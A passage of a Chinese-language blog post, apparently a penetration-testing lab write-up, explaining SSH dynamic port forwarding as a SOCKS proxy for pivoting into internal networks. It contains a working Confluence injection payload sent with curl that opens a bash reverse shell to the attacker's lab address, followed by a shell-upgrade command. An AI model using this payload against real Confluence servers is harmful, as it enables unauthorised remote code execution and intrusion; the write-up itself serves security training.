發表文章

目前顯示的是有「Dynamic Port Forwarding」標籤的文章

SSH Tunneling - Dynamic Port Forwarding

圖片
  SSH Tunneling - Dynamic Port Forwarding 上一篇本機連接埠轉送有一個明顯的限制:每個 SSH 連線只能連接到一個套接字 這使得大規模使用變得非常乏味。幸運的是,OpenSSH 還提供動態連接埠轉送 從 SSH 用戶端上的單一偵聽端口,封包可以轉送到 SSH 伺服器主機有權存取的任何套接字 SSH 動態連接埠轉送之所以有效,是因為 SSH 用戶端所建立的偵聽連接埠是 SOCKS 代理伺服器連接埠 SOCKS 是一種代理協定,與郵政服務非常相似。 SOCKS 伺服器接受資料包(帶有 SOCKS 協定標頭)並將它們轉發到它們所尋址的任何地方。 在 SSH 動態連接埠轉送中,封包可以傳送到 SSH 用戶端電腦上的單一偵聽 SOCKS 連接埠。 這些將透過 SSH 連接推送,然後轉發到 SSH 伺服器電腦可以路由的任何地方。 唯一的限制是資料包必須正確格式化 - 通常由 SOCK 相容的客戶端軟體格式化。 在某些情況下,軟體預設不相容於 SOCKS。 如下網路圖中說明 SSH 動態連接埠轉送 攻擊機 : 192.168.45.183 靶機環境 : 192.168.216.63、10.4.216.215、172.16.216.217 起手第一步先 CONFLUENCE 漏洞進入 192.168.216.63 curl -v http://192.168.216.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.183/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 Port 就進來了,接著下 python3 -c 'import pty; pty.spawn("/bin/bash")' 確保 TTY Shell 接著使用指令 ssh -N -D 0.0.0.0:9...